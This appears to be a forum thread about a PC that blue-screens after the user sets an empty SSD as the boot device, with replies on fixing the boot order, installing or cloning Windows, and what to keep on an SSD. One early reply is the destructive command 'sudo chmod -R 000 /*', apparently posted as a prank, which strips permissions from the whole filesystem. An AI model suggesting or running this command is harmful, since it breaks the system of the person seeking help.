Did you install windows on the ssd? Sorry but it has to be asked.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

more information needed. im not going to assume that you installed windows on that os, so i have to ask: did you install windows to that ssd? no wonder you get blue screen if you try to boot ur pc on a drive that doesent have os in it.

It sounds like what you did is changed your boot device from the hard drive you were using before to the SSD, so the bios is not looking on your old hard drive. So try changing it back in the bios and it should boot. And like the others are saying you have to have windows installed on that SSD before your computer will boot to it

Windows was instaled on the HDD

You can't boot from the SSD if there's no OS on it, you need to install windows on the SSD or switch the boot device back to the HDD and use software clone the HDD to the SSD if it will fit(usually SSDs will come with a link to download the cloning software)

no shit you get blue screen. if you try to boot with your ssd(you selected the ssd as a boot device) and it doesent have os in it, it cant boot up, there is nothing to get booted up into lol. press delete or whatever and select your hdd as boot drive. if you want windows to your ssd you have to install it in it first.

Then that's our problem. Windows won't magically transfer over to the ssd. You need to install it from scratch to the ssd OR clone it from the hard drive, but the second only works if all your data fits on the ssd.

win10 64bit is about 20gigs. im thinking of getting a ssd, 850 evo 240gb. i would have over 200gb for games after os. what all should i generally put into my ssd? antivirus, os, (open office?), and then just games if i want to?

The os is what matters. The rest should be used for programs you use very often and for programs that are so small they don't clog the drive. The ant virus doesn't really care where you put it, ideally it would be running all the time so it doesn't have anything that it needs to load from disk often.
